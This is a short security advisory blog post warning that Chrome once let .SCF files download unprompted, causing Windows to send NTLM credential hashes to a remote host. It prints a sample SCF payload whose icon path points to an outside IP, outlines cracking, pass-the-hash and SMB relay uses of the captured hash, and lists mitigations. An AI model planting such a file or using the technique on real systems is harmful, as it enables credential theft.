BOLO: Chrome Spreads Your Creds!

,

There is a vulnerability that exists in the current version of Google’s Chrome browser that can allow your Windows Login, or Network Login, credentials to be pilfered by a remote hacker.

The problem occurs by having Chrome download a harmless .SCF file.  These files are very much like the .LNK files of old.  SCF stands for “Short-Cut File”.   As researcher Bosko Stankovic points out in his original post here, a SCF file might look something like this:

[Shell]
IconFile=\\170.170.170.170\icon

After the Stuxnet exploit, Google changed Chrome so that .LNK files would be appended with “.download“, preventing action by the Operating System.  However, there was no such corrective action applied to .SCF file.

The SCF file is executed by Windows whenever the folder (usually “Downloads“)containing it is opened.  In our example about, the local user’s PC will go to IP address 170.170.170.170 and do either NTLMv1 (NT LAN Manager, version 1) or NTLMv2 (version 2) authentication.  This is still a secure hash however (version 2 much more secure than version 1).

Still, with the secure hash captured, the attacker at 170.170.170.170 can do a few things:

  1. Bruce-Force the secure hash and recover the plaintext password using widely-available NTLM tools.
  2. Feed the hash into another Windows system for authentication, say an Exchange Server (the plaintext password needn’t even be decrypted).
  3. Use SMB Relay tools to allow the hacker to access the various other accounts that might be associated with the user, such as OneDrive,  Skype, Office 365, Xbox Live, etc.
Until Google fixes Chrome there are a few things that can be done to mitigate the problem:
  • Change Chrome settings to always ask where to save each file before downloading.  The user can cancel the .SCF file download at that time.
  • If you have a good firewall/UTM system, you can have it block the downloads of .SCF files.
  • Perhaps the most reasonable solution would be to go into the network firewall/UTM and block incoming and outgoing TCP ports 139 and 445.
  • Switch to another browser (Internet Explorer, Edge, Firefox, Opera, Safari, etc.).

1 Comment

  1. Jared Hall
    June 7, 2017 @ 9:01 pm

    UPDATE: 6/4/2017: Google made a change in their File Type Policies, which is made available to all versions of Chrome. They treat .SCF files as dangerous and popup a warning message. See: https://bugs.chromium.org/p/chromium/issues/detail?id=722524